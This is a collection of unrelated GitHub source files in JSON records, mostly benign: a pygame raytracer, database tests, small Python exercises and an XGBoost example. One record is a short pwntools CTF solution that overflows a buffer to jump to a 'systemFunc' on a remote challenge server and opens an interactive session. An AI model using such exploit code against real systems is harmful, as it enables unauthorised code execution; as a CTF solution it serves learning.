Ks=0.2, matType=OPAQUE)\nglass = Material(diffuse=(0.9, 0.9, 0.9), spec=64, Ks=0.15, ior=1.5, matType=TRANSPARENT)\ndiamond = Material(diffuse=(0.5, 0.9, 1), spec=128, Ks=0.2, ior=2.417, matType=TRANSPARENT)\nregalo = Material(diffuse=(0.5, 0.9, 1), spec=128, Ks=0.2, ior=2.417, matType=REFLECTIVE)\n\nfloor_material = Material(diffuse=(1, 0.4, 0.4), spec=8, Ks=0.01, matType=REFLECTIVE) # Rojo\nceiling_material = Material(diffuse=(0.4, 1, 0.4), spec=32, Ks=0.1, matType=REFLECTIVE) # Verde\nfront_wall_material = Material(diffuse=(0.4, 0.4, 1), spec=256, Ks=0.2, matType=OPAQUE) # Azul\nleft_wall_material = Material(diffuse=(1, 1, 0), spec=64, Ks=0.2, matType=OPAQUE) # Amarillo\nright_wall_material = Material(diffuse=(1, 0, 1), spec=64, Ks=0.15, matType=TRANSPARENT) # Morado\n\nboca = Material(diffuse=(197/255, 178/255, 137/255), spec=256, Ks=0.2, matType=OPAQUE)\n\nojos = Material(diffuse=(0, 0, 0), spec=256, Ks=0.2, matType=REFLECTIVE)\n\n\n\nraytracer.camPosition=[0, 0.5, 0.75]\ndef rotation_y_matrix(angle):\n \"\"\" Devuelve una matriz de rotación alrededor del eje Y. \"\"\"\n c = cos(angle)\n s = sin(angle)\n\n return [\n [c, 0, s],\n [0, 1, 0],\n [-s, 0, c]\n ]\n\n\n\nhorizontal_body_position = (0, 1, -4) \nhorizontal_body_radii = (0.65, 0.57, 0.7) \nhorizontal_body_material = brick\nraytracer.scene.append(Ellipsoid(position=horizontal_body_position, radii=horizontal_body_radii, material=piel))\nhorizontal_body_position1 = (0, 2, -3) \nhorizontal_body_radii1 = (0.256, 0.185, 0.5) \nhorizontal_body_material1 = brick\nraytracer.scene.append(Ellipsoid(position=horizontal_body_position1, radii=horizontal_body_radii1, material=boca))\n\nleft_ear_position = (-0.7, 1.37, -4.1)\nright_ear_position = (0.7, 1.37, -4.1)\near_radii = (0.2, 0.2, 0.2)\n\nraytracer.scene.append(Sphere(position=left_ear_position, radius=0.3, material=boca))\nraytracer.scene.append(Sphere(position=right_ear_position, radius=0.3, material=boca))\nleft_eye_position = (-0.18, 0.55, -1.8)\nright_eye_position = (0.18, 0.55, -1.8)\n\nraytracer.scene.append(Sphere(position=left_eye_position, radius=0.1/2, material=ojos))\nraytracer.scene.append(Sphere(position=right_eye_position, radius=0.1/2, material=ojos))\n\nnariz = Material(diffuse=(0, 0, 0), spec=256, Ks=0.2, matType=REFLECTIVE)\n\n# Posición de la nariz\nnose_position = (0, 0.4, -1.7) \nraytracer.scene.append(Sphere(position=nose_position, radius=0.05, material=nariz))\n\n# Cuerpo del osito\nbody_position = (0, -0.75, -4) \nbody_radii = (0.75, 0.8, 1) \nbody_material = brick\nraytracer.scene.append(Ellipsoid(position=body_position, radii=body_radii, material=piel))\nwhite_belly = Material(diffuse=(1, 1, 1), spec=256, Ks=0.2, matType=OPAQUE)\nbelly_position = (0, 0, -3.8) \n\n\n# Brazo izquierdo\nleft_arm_position = (1.8, 7.5, -3.9) \nleft_arm_radii = (0.5/5, 0.25/5, 0.25/5) \nleft_arm_material = brick\nraytracer.scene.append(Ellipsoid(position=left_arm_position, radii=left_arm_radii, material=piel))\n\n# Brazo derecho\nright_arm_position = (-1.8, 7.5, -4.1) \nright_arm_radii = (0.5/5, 0.25/5, 0.25/5) \nright_arm_material = brick\nraytracer.scene.append(Ellipsoid(position=right_arm_position, radii=right_arm_radii, material=piel))\n\nraytracer.scene.append(Ellipsoid(position=(-1.8, 2.5, -4.1), radii=(0.4/5, 0.25/5, 0.25/5), material=piel))\nraytracer.scene.append(Ellipsoid(position=(1.8, 2.5, -4.1), radii=(0.4/5, 0.25/5, 0.25/5), material=piel))\n# Parámetros para el OBB\nobb_position = [0, 0.006, 0] \nobb_size = [0.25, 0.25, 0.25] \nobb_rotation_matrix = [ \n [1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]\n]\nobb_material = brick \n\n#raytracer.scene.append(OBB(position=obb_position, size=obb_size, rotation_matrix=obb_rotation_matrix, material=obb_material))\n\n\nraytracer.scene.append(Ellipsoid(position=(4, 1, -5), radii=(0.7, 1, 1), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(6.2, 1, -5), radii=(0.7, 1, 1.1), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(5, 1.9, -7), radii=(1.7, 2.2, 1.7), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=REFLECTIVE)))\nraytracer.scene.append(Ellipsoid(position=(4, 2.5, -8), radii=(1.8, 2.4, 1.7), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(2.2, 2, -7), radii=(1.7, 2.2, 1.7), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=REFLECTIVE)))\n#raytracer.scene.append(Ellipsoid(position=(7.5, 1.75, -2), radii=(0.15, 0.9, 0.9), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(9.5, 1.8, -7), \n radii=(1.3, 2.3, 1.7), \n material=Material(diffuse=(158/255, 104/255, 39/255), \n spec=64, \n Ks=0.2, \n \n matType=OPAQUE)))\ncilindro_position = (9, 0, -8) \ncilindro_radius = 0.5/10 \ncilindro_height = 8 \ncilindro_material = brick \n\n\n\nraytracer.scene.append(ThinCylinder(position=(9, 0, -8.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, 0, -11.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -1, -13), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -3, -15.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -4, -17.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, 0.4, -28.75\n ), radius=0.5/10, height=8, material=white_opaque))\nv0 = [-2.5/4, -2.5/4, 0]\nv1 = [2.5/4, -2.5/4, 0]\nv2 = [0, 2.5/4, 0]\n\n#triangulo = Triangle(v0, v1, v2, brick)\n#raytracer.scene.append(triangulo)\n\n\nraytracer.scene.append(OBB(position=[-2, -1.25, -4], size=[2, 2, 2], rotation_matrix=[[1, 0, 0], [0, 1, 0], [0, 0, 1]], material=box))\nraytracer.scene.append(OBB(position=[1.5, -1.25, -4], size=[2, 2, 2], rotation_matrix=[[1, 0, 0], [0, 1, 0], [0, 0, 1]], material=box))\n\nraytracer.scene.append(AABB(position=(-2.5, -2.8, -7), size=(1,1,1), material=diamond))\n#raytracer.scene.append(AABB(position=(-6.5, -1.2, -7), size=(1.2,1.5,1), material=regalo))\nraytracer.scene.append(AABB(position=(3.5, -2.8, -7), size=(1,1,1), material=diamond))\n\n\n\nraytracer.lights.append(AmbientLight(intensity=0.6))\nraytracer.lights.append(DirectionalLight(direction=(0, -1, 0), intensity=0.9))\n\n\n\nraytracer.rtClear()\nraytracer.rtRender()\n\nprint(\"\\nRender Time:\", pygame.time.get_ticks() / 1000, \"secs\")\n\nisRunning = True\nwhile isRunning:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n isRunning = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n isRunning = False\n\npygame.quit()\n","repo_name":"AGM54/PROYECTO2DEGRAFICAS","sub_path":"RayTracer.py","file_name":"RayTracer.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73097568869","text":"#!/usr/bin/env python3\nimport subprocess\nfrom itertools import product\n\nimport re\nimport sys\nfrom io import StringIO\n\nimport pytest\nfrom tests import test_sets\n\n\ndef make_output(column_names, output):\n f = StringIO()\n f.write(\" \".join(column_names) + \"\\n\")\n for t in output:\n if isinstance(t, int):\n t = [t]\n f.write(\" \".join(map(str, t)) + \"\\n\")\n return f.getvalue()\n\n\ndef write_outputs(tmpdir, outputs):\n with open(tmpdir / \"out\") as f:\n for n, output in enumerate(outputs, start=1):\n f.write(\"query number: %d\\n\" % n)\n f.write(output)\n\n\ndef make_csv(column_names, values, key_len):\n f = StringIO()\n f.write(\" \".join(column_names) + \"; %d\\n\" % key_len)\n for v in values:\n if isinstance(v, int):\n v = [v]\n f.write(\" \".join(map(str, v)) + \"\\n\")\n return f.getvalue()\n\n\ndef write_csv(tmpdir, csv):\n (tmpdir / \"csv\").write(csv)\n\n\ndef write_queries(tmpdir, queries):\n with (tmpdir / \"in\").open(\"w\") as f:\n for query in queries:\n f.write(query + \"\\n\")\n\n\ndef make_query(columns, intervalslist):\n preds = []\n for column, intervals in zip(columns, intervalslist):\n for interval in intervals:\n preds.append(column + \"=\" + interval)\n return \"select %s where %s\" % (\", \".join(columns), \", \".join(preds))\n\n\nfullscan_col_re = re.compile(\"^plan: Range scan result: \\(first_remaining_column=(\\d+)*\")\n\n\ndef extract_first_remaining_column(lines):\n results = []\n for line in lines:\n if line.startswith(\"plan:\"):\n res = fullscan_col_re.match(line)\n if not res:\n continue\n results.append(int(res.group(1)))\n return results\n\n\ndef read_err(tmpdir):\n with (tmpdir / \"err\").open(\"r\") as f:\n return list(f)\n\n\ndef extract_results(lines):\n results = []\n current_result = []\n current_header = []\n for l in lines:\n l = l.rstrip()\n if not l:\n continue\n if l.startswith(\"query number:\"):\n if current_header:\n results.append((current_header, current_result))\n current_header = []\n current_result = []\n continue\n t = l.split(\" \")\n if not current_header:\n current_header = t\n else:\n current_result.append(list(map(int, t)))\n if current_header:\n results.append((current_header, current_result))\n return results\n\n\ndef read_out(tmpdir):\n with (tmpdir / \"out\").open(\"r\") as f:\n return list(f)\n\n\ndef test_make_query():\n intervals = [\"[1..2)\", \"[3..3]\"]\n\n res = make_query([\"c\"], [intervals])\n\n assert res == \"select c where c=[1..2), c=[3..3]\"\n\n\ndef test_make_csv():\n cols = [\"a\"]\n vals = [1, 2]\n\n res = make_csv(cols, vals, 1).rstrip().split(\"\\n\")\n\n assert res == [\"a; 1\", \"1\", \"2\"]\n\n\ndef test_extract_first_remaining_column():\n s = [\"dupa\", \"plan: dupa\",\n \"plan: Range scan result: (first_remaining_column=3, rows=<1..2>)\",\n \"plan: Range scan result: (first_remaining_column=4, rows=<1..2>)\"]\n\n res = extract_first_remaining_column(s)\n\n assert res == [3, 4]\n\n\ndef test_extract_results():\n lines = [\n \"\",\n \" \",\n \"query number:\",\n \"a b c \\n\",\n \"1 1 1 \",\n \"2 2 2 \",\n \"query number: 1\",\n \"a\",\n \"4\",\n \"query number: 2\",\n \"q\"\n ]\n\n results = extract_results(lines)\n\n assert results == [\n ([\"a\", \"b\", \"c\"], [[1, 1, 1], [2, 2, 2]]),\n ([\"a\"], [[4]]),\n ([\"q\"], [])\n ]\n\n\n# noinspection PyShadowingNames\ndef call_planty_db(tmpdir, plantydb):\n return subprocess.run(\"{plantydb} {csv} < {inp} 1> {out} 2> {err}\".format(\n plantydb=plantydb, csv=tmpdir / \"csv\", inp=tmpdir / \"in\", out=tmpdir / \"out\",\n err=tmpdir / \"err\"), shell=True).returncode\n\n\n@pytest.mark.parametrize(\"test_input,key_len,intervals_reversed\",\n product(test_sets.interval_pairs, [0, 1], [True, False]))\ndef test_interval_pair(tmpdir, plantydb, test_input, key_len, intervals_reversed):\n intervals, results, _ = test_input\n if intervals_reversed:\n intervals.reverse()\n write_queries(tmpdir, [make_query([\"c\"], [intervals])])\n write_csv(tmpdir, make_csv([\"c\"], test_sets.column, key_len=key_len))\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [([\"c\"], [[r] for r in results])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"test_input,key_len\",\n product(\n test_sets.interval_singles + test_sets.intervals_in_relation_to_data,\n [0, 1]))\ndef test_interval_single(tmpdir, plantydb, test_input, key_len):\n interval, results, _ = test_input\n write_queries(tmpdir, [make_query([\"c\"], [[interval]])])\n write_csv(tmpdir, make_csv([\"c\"], test_sets.column, key_len=key_len))\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [([\"c\"], [[r] for r in results])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"case\", test_sets.plan_tests)\ndef test_plan(tmpdir, plantydb, case: test_sets.case):\n cols = [\"c%d\" % c for c in range(case.columns_count)]\n write_queries(tmpdir, [make_query(cols, [[x] for x in case.preds])])\n write_csv(tmpdir, make_csv(cols, case.values, case.keylen))\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [case.result.fullscan_column] == extract_first_remaining_column(read_err(tmpdir))\n\n\n@pytest.mark.parametrize(\"case\", test_sets.OutputOrderingTests.cases)\ndef test_output_ordering(tmpdir, plantydb, case: test_sets.OutputOrderingTests.case):\n cols = [\"c%d\" % c for c in range(case.columns_count)]\n write_queries(tmpdir, [make_query(cols, [[x] for x in case.preds])])\n write_csv(tmpdir, make_csv(cols, case.values, 0))\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [(cols, [list(x) for x in case.result])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"key_len\", [0, 1])\ndef test_empty_csv(tmpdir, plantydb, key_len):\n cols = [\"c0\", \"c1\"]\n write_csv(tmpdir, make_csv(cols, [], key_len))\n write_queries(tmpdir, [make_query(cols, [[\"0\", \"[1..)\"], [\"(..1]\", \"2\"]])])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [(cols, [])] == extract_results(read_out(tmpdir))\n\n\n@pytest.mark.parametrize(\"key_len\", [0, 1])\ndef test_empty_csv(tmpdir, plantydb, key_len):\n cols = [\"c0\", \"c1\"]\n write_csv(tmpdir, make_csv(cols, [], key_len))\n write_queries(tmpdir, [make_query(cols, [[\"0\", \"[1..)\"], [\"(..1]\", \"2\"]])])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [(cols, [])] == extract_results(read_out(tmpdir))\n\n\ndef test_no_where(tmpdir, plantydb):\n cols = [\"a\"]\n write_csv(tmpdir, make_csv(cols, [[1]], 0))\n write_queries(tmpdir, [\"select a\"])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [(cols, [[1]])] == extract_results(read_out(tmpdir))\n\n\ndef test_select(tmpdir, plantydb):\n cols = [\"a\", \"b\", \"c\"]\n write_csv(tmpdir, make_csv(cols, [[1, 2, 3]], 0))\n write_queries(tmpdir, [\n \"select a\",\n \"select b, a\",\n \"select *\",\n \"select *, a\"\n ])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [([\"a\"], [[1]]),\n ([\"b\", \"a\"], [[2, 1]]),\n ([\"a\", \"b\", \"c\"], [[1, 2, 3]]),\n ([\"a\", \"b\", \"c\", \"a\"], [[1, 2, 3, 1]])\n ] == extract_results(read_out(tmpdir))\n\n\ndef test_wrong_column(tmpdir, plantydb):\n cols = [\"a\"]\n write_csv(tmpdir, make_csv(cols, [], 0))\n write_queries(tmpdir, [make_query(\"select b\", [])])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert [\"query error: unknown column name: s\"] == [l.rstrip() for l in read_out(tmpdir)]\n\n\ndef test_unsorted_key_column(tmpdir, plantydb):\n cols = [\"a\", \"b\"]\n write_csv(tmpdir, make_csv(cols, [[1, 2], [1, 1]], 2))\n write_queries(tmpdir, [])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 26\n assert [\"table error: key of row 1 is lesser than previous row\"] == \\\n [l.rstrip() for l in read_out(tmpdir)]\n\n\ndef test_syntax_errors(tmpdir, plantydb):\n cols = [\"a\", \"b\"]\n write_csv(tmpdir, make_csv(cols, [[1, 2]], 2))\n write_queries(tmpdir, [\n \"\",\n \"select a, where b=1\",\n \"select a,\",\n \"select a b where a=1\",\n \"select a b\",\n \"select where a=1\",\n \"select\",\n \"select a where a=1,\",\n \"select a where a=1 b=1\",\n \"select a where\",\n \"select a where a=\",\n \"select a where a=b\",\n \"select a where =[..1)\",\n \"select a where a=[1..1\",\n \"select a where a=1..1]\",\n \"select a where a=[1-1]\",\n \"select a where a=[a..2]\",\n \"select a where a=1 \"\n ])\n\n rc = call_planty_db(tmpdir, plantydb)\n\n assert rc == 0\n assert ['query error: no select at the beginning',\n 'query error: unknown column name: where',\n 'query error: no comma after select list',\n \"query error: something else than 'where' after select list: b\",\n \"query error: something else than 'where' after select list: b\",\n 'query error: unknown column name: where',\n 'query error: select list empty',\n 'query error: no comma after where list',\n \"query error: there's something after 'where': b=1\",\n 'query error: where list empty',\n 'query error: Error during converting to integer:',\n 'query error: Error during converting to integer: b',\n 'query error: unknown column name:',\n 'query error: bad range close: [1..1',\n 'query error: bad range open: 1..1]',\n 'query error: Error during converting to integer: [1-1]',\n 'query error: Error during converting to integer: a',\n 'query number: 1', 'a', '1'] == \\\n [l.rstrip() for l in read_out(tmpdir)]\n\nif __name__ == \"__main__\":\n exit(pytest.main(sys.argv))","repo_name":"k-stanislawek/planty-db","sub_path":"dev_scripts/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72840222949","text":"from pwn import *\r\n\r\nbinary = context.binary = ELF('./chall_13')\r\npayload = b'A'*0x3e\r\npayload += p32(binary.sym.systemFunc)\r\np = remote('chal.2020.sunshinectf.org',30013)\r\np.sendline('IxZ')\r\np.sendline(payload)\r\nprint(payload)\r\np.interactive()\r\n\r\n","repo_name":"IxZZZ/CTF","sub_path":"CTF_2020/sunshinectf.2020/Solution/exploit13.py","file_name":"exploit13.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71848330791","text":"while 1:\n print('CONVERSOR DE UNIDADES: MILHA x KM\\n')\n print('''Escolha um número:\n 1- Milhas para km\n 2 - Km para milhas''')\n opcao = int(input('Digite aqui: '))\n if opcao == 1:\n milhas = float(input('Quantas milhas? '))\n km = milhas * 1.60934\n print(f'\\n{milhas} milhas valem {km:.2f}km')\n input('Pressione qualquer tecla para continuar\\n\\n')\n if opcao == 2:\n km = float(input('Quantos km? '))\n milha = km * 0.621371\n print(f'\\n{km}km valem {milha:.2f} milhas')\n input('Pressione qualquer tecla para continuar\\n\\n')\n","repo_name":"JoaoPROFECIA/pycharm-curso-em-video","sub_path":"pythonProject/Curso Mundo 1/ex008b - conversor de unidades milha x km.py","file_name":"ex008b - conversor de unidades milha x km.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34883661057","text":"#!/bin/python3\nimport sys\n\n# return True if G contains P\ndef contains(G, P):\n first_line = P[0]\n sub_len = len(first_line)\n for g_idx in range(len(G) - len(P) + 1):\n try:\n start_idx = 0\n row = G[g_idx]\n while(1):\n idx = row.index(first_line, start_idx)\n start_idx = idx+1\n if len(P) == 1 or all(lineG[idx:idx+sub_len] == lineP for lineP, lineG in zip(P[1:], G[g_idx+1:])):\n return True\n \n except ValueError:\n pass\n return False\n\n \nt = int(input().strip())\nfor _ in range(t):\n R,C = input().strip().split(' ')\n R,C = [int(R),int(C)]\n G = []\n G_i = 0\n for _ in range(R):\n G_t = str(input().strip())\n G.append(G_t)\n r,c = input().strip().split(' ')\n r,c = [int(r),int(c)]\n P = []\n P_i = 0\n for _ in range(r):\n P_t = str(input().strip())\n P.append(P_t)\n \n ans = contains(G, P)\n print(\"YES\" if ans else \"NO\")\n","repo_name":"LysanderGG/HackerRank","sub_path":"Algorithms/Implementation/TheGridSearch.py","file_name":"TheGridSearch.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"15308100663","text":"\"\"\"\nGroupby\n\nAgrupa elementos de acordo com propriedades comuns.\nÉ obrigatório que o conjunto esteja ordenado pela propriedade escolhida.\n\"\"\"\n\nfrom itertools import groupby\n\nalunos = [\n {'nome': 'Luiz' , 'nota': 'A'},\n {'nome': 'Letícia' , 'nota': 'B'},\n {'nome': 'Fabrício' , 'nota': 'A'},\n {'nome': 'Rosemary' , 'nota': 'C'},\n {'nome': 'Joana' , 'nota': 'D'},\n {'nome': 'João' , 'nota': 'A'},\n {'nome': 'Eduardo' , 'nota': 'B'},\n {'nome': 'André' , 'nota': 'A'},\n {'nome': 'Anderson' , 'nota': 'C'},\n {'nome': 'José' , 'nota': 'B'},\n]\n\nnota = lambda aluno: aluno['nota']\n\nprint('Ordena por nota')\nalunos.sort(key=nota)\n\nfor aluno in alunos:\n print(aluno)\n\nprint('\\nAgrupa por nota')\nalunos_agrupados = groupby(alunos, nota) # Notas devem estar ordenadas !!\nlista_aluno = list()\n\nfor nota, grupo in alunos_agrupados:\n print(f'Nota: {nota}, grupo:')\n lista_aluno = list(grupo)\n\n for aluno in lista_aluno:\n print(f'\\t{aluno}')\n\n print(f'\\tQuantidade de alunos: {len(lista_aluno)}\\n')\n","repo_name":"axellbrendow/python3-basic-to-advanced","sub_path":"aula041-groupby/aula41.py","file_name":"aula41.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"20022500324","text":"# Computer muss raten\r\nimport random\r\nRegel = \"DU denkst dir eine Zahl zwischen 1 und 1000.\"\r\nprint(Regel)\r\nprint(\"Merk sie dir gut! Ich rate:\")\r\nUnten = 1\r\nOben = 1000 \r\nVersuche = 0\r\nInfo = \"\"\r\nwhile Info != \"richtig\" :\r\n Versuche += 1\r\n Zahl = int((Oben+Unten)/2)\r\n print(str(Versuche) + \". Versuch: \" + str(Zahl))\r\n print(\"Ist die Zahl richtig/zu klein/zu groß? \", end=\"\")\r\n Info = input()\r\n if Info == \"zu klein\" :\r\n Unten = Zahl\r\n if Info == \"zu groß\" :\r\n Oben = Zahl\r\n if Info == \"richtig\" : \r\n print(\"OK - \", end=\"\")\r\n else :\r\n print(\"Schade - \", end=\"\")\r\nprint(\"Das waren \" + str(Versuche) + \" Versuche.\")\r\n\r\n","repo_name":"schnow265/random-stuff","sub_path":"Old Projects/python-archive/Spickzettel/raten5.py","file_name":"raten5.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12006270918","text":"import pygame\nfrom pygame import color\n\npygame.init()\nwidth = 600\nheight = 600\ndisplay = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"mouse\")\nimage = pygame.image.load(\"微信图片_20220406155921.jpg\")\nrect = image.get_rect()\nrect.topleft = (25, 25)\n\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n print(event)\n mouse_x = event.pos[0]\n mouse_y = event.pos[1]\n rect.centerx = mouse_x\n rect.centery = mouse_y\n if event.type == pygame.MOUSEMOTION and event.buttons[0]==1:\n print(event)\n mouse_x = event.pos[0]\n mouse_y = event.pos[1]\n rect.centerx = mouse_x\n rect.centery = mouse_y\n display.fill((0, 0, 0))\n display.blit(image, rect)\n pygame.display.update()\npygame.quit()\n","repo_name":"cycleing2/pythonProject8","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39607456985","text":"import numpy as np\r\n\r\nfrom UCTB.dataset import NodeTrafficLoader\r\nfrom UCTB.model import XGBoost\r\nfrom UCTB.evaluation import metric\r\n\r\ndata_loader = NodeTrafficLoader(dataset='Bike', city='DC', closeness_len=6, period_len=7, trend_len=4,\r\n with_lm=False, normalize=False)\r\n\r\nprediction_test = []\r\n\r\nfor i in range(data_loader.station_number):\r\n\r\n print('*************************************************************')\r\n print('Station', i)\r\n\r\n model = XGBoost(n_estimators=100, max_depth=3, objective='reg:squarederror')\r\n\r\n model.fit(np.concatenate((data_loader.train_closeness[:, i, :, 0],\r\n data_loader.train_period[:, i, :, 0],\r\n data_loader.train_trend[:, i, :, 0],), axis=-1),\r\n data_loader.train_y[:, i, 0])\r\n\r\n p_test = model.predict(np.concatenate((data_loader.test_closeness[:, i, :, 0],\r\n data_loader.test_period[:, i, :, 0],\r\n data_loader.test_trend[:, i, :, 0],), axis=-1))\r\n\r\n prediction_test.append(p_test.reshape([-1, 1, 1]))\r\n\r\nprediction_test = np.concatenate(prediction_test, axis=-2)\r\n\r\nprint('Test RMSE', metric.rmse(prediction_test, data_loader.test_y, threshold=0))","repo_name":"uctb/UCTB","sub_path":"QuickStarts/XGBoost.py","file_name":"XGBoost.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"71"}